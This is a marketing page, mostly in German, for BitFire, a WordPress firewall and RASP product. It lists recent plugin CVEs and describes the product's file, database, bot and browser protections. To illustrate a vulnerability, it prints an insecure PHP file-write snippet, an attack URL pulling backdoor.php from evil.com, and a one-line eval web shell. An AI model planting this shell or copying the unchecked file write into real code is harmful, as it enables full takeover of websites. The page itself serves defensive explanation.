BitFire ist ein neuer Ansatz für die Sicherheit von WordPress, der die erste für WordPress verfügbare Runtime Application Self Protection (RASP) integriert.
Kostenlos starten| Plugin | CVE | Date | Score | Sites | Protection |
|---|---|---|---|---|---|
|
CVE-2023-xxxx | Sep 7 | 9.8 | 60,000+ | ● FILE RASP |
|
CVE-2023-4596 | Aug 17 | 9.8 | 10,000 + | ● DB RASP |
|
CVE-2023-37390 | Aug 7 | 9.8 | 3 Million + | ● PHP WAF |
|
CVE-2023-4596 | Aug 4 | 9.8 | 3 Million + | ● File RASP |
|
CVE-2023-3162 | Aug 1 | 9.8 | 20,000 + | ● Auth RASP |
|
CVE-2023-3460 | Jul 4 | 5.3 | 5 Million + | ● DB RASP |
|
CVE-2023-37999 | Mar 23 | 9.8 | 100,000 + | ● DB RASP |
|
CVE-2023-28121 | Mar 23 | 9.8 | 600,000 + | ● Auth RASP |
Runtime Application Self Protection ist eine Sicherheits-Sandbox für Ihre gesamte Website. Eine herkömmliche WAF läuft vor Ihrer Website und blockiert oder erlaubt den Datenverkehr auf der Grundlage von Signaturen, die einen Angriff erkennen können oder auch nicht.. RASP läuft zwischen Ihrer Website und dem Betriebssystem und verhindert unbefugte Datenbank- und Dateisystemänderungen.
BitFire Free installieren* Kostenlose 5-minütige Installation. Keine Kreditkarte erforderlich.
Zusätzlich zum Standardschutz, den andere WAF-Lösungen bieten, verfügt BitFire über 4 einzigartige Funktionen, die hinter Ihrer Website laufen und Ihr Dateisystem, Ihre Datenbank und Ihre Client-Webbrowser nahtlos und ohne Signaturen schützen.
RASP sperrt Ihre PHP-Dateien zum Schreiben, um zu verhindern, dass Angreifer Ihre Plugins oder Kerndateien verändern..
99 % der Hacks sind automatisiert, die Netzwerkauthentifizierung lässt nur bekannte, autorisierte Bots zu und sperrt Hacker aus..
Verhindern Sie Redirect- und andere Browser-Angriffe, indem Sie mit Auto-CSP nur Inhalte von zugelassenen Websites erzwingen.
Vervollständigen Sie Ihr Sicherheitskonzept mit einem Datenbankschutz, der Hintertürkonten und andere Datenbank-Malware verhindert..
BitFire's RASP runs between WordPress (or any PHP code) and your Operating System files. It is able to prevent the most serious security vulnerabilities from being exploited on your site. Consider the following vulnerability where a plugin is fetching a remote image and saving to the local website:
<?php
$r = $_GET['remote_image'];
// fetch remote image:
$data = file_get_contents($image);
// local file name = content_dir + original filename
$filename = WP_CONTENT_DIR . basename($image);
// save image for local use:
💀 file_put_contents($filename, $data);
<?php
# 🔭 did you spot the vulnerability? ~~~~~~~
# The plugin forgot to ensure that the file is an image file:
💀 file_put_contents($filename, $data);
# This vulnerability allows anyone to upload backdoor PHP code...~~
<?php
# www.site.com/vulnerable?remote_image=http://evil.com/backdoor.php
# backdoor.php:
echo '🦠 <?php eval($_GET["x"]);\n'; ~~
# This "image" is a backdoor executing any PHP code ~~~~
😧 ~~~~~
# Resulting in complete compromise of all website files and data! ~~~~~
😵
<?php
# BitFire protects vulnerable plugin code like this by
# intercepting all file writes before they execute:
💀 file_put_contents($_GET['name'], $_GET['data']);~~~
# And preventing any writes to a PHP file by a non-administrator.
~~~💓~~~~💓~~~💓~~~
# Without any custom extensions, guaranteed ~~~🥂~~~~~~~~~~~~~~~~~~~~~~~~~~
Hacker geben sich oft als Internet-Bots wie GoogleBot usw. aus.. Andere WAFs blockieren Bots in der Hoffnung, dass sie sich selbst identifizieren. Nur BitFire authentifiziert das Quellnetzwerk des Bots, um den authentischen Datenverkehr zu überprüfen.
Jeder Bot kann so konfiguriert werden, dass er von überall aus zugelassen, mit authentifizierter IP oder vollständig blockiert wird, und BitFire kann benutzerdefinierte oder unbekannte Bots lernen, so dass Sie vollständig abgesichert sind..
Sichern Sie sensible Daten mit der BitFire RASP-Datenbank. Schutz von Benutzeranmeldedaten, Blogbeiträgen, Produktinformationen und anderen sensiblen Datenbankinformationen. BitFire kann den Zugriff oder die Änderung jeder Datenbankkomponente durch unbefugte Benutzer verhindern, unabhängig von einer bestehenden Sicherheitslücke.
Vollständiger garantierter Schutz in weniger als 2 Millisekunden *
Schützen Sie sich vor 0-Day-Bedrohungen mit Sicherheitsprozessen nicht nur mit Signaturen.
Umfassende Kundenbetreuung
Support 7 Tage pro Woche durch Entwickler in den USA
Unterstützung bei der Installation
Sie erhalten 1 Stunde kostenlosen technischen Support bei der Installation
24x7 Netzwerküberwachung
Alle Installationen erhalten eine kostenlose automatische Systemüberwachung
WordPress Plugin Überwachung
Stündliche Plugin-Prüfungen auf die neuesten Sicherheitslücken halten Ihre Website auf dem neuesten Stand
Offsite-Datenbank-Backups
Gigabytes an externen Datenbanksicherungen mit einem einzigen Klick
Ihre Sicherheit sollte vernetzt und mobil sein. BitFire verbindet sich mit anderen Quellen, damit Sie sicher bleiben.
Senden Sie Warnmeldungen und Standortinformationen automatisch in einem Kanal mit einem einfachen Plugin.
Bleiben Sie auf dem Laufenden über die Sicherheit mit umsetzbaren Sicherheitsberichten, um sicherzustellen, dass Ihre Website auf dem neuesten Stand ist.
Wiederherstellung einer bereits gehackten Website und Verhinderung benutzerdefinierter Angriffe auf den WordPress-Kern und Plugins.
Stellen Sie eine direkte Verbindung zur REST-HTTP-API her, um die neuesten Daten abzurufen und die Firewall dynamisch zu konfigurieren und zu integrieren..
Einfache Verbindung mit Elastic Search zum Speichern und Berichten über blockierten und erlaubten Datenverkehr in Echtzeit.
Einfache Integration von BitFire in jedes PHP-Projekt, einschließlich kundenspezifischer und selbst entwickelter Anwendungen.
Wir können Ihnen bei der Lösung von Web-Sicherheitsproblemen helfen.
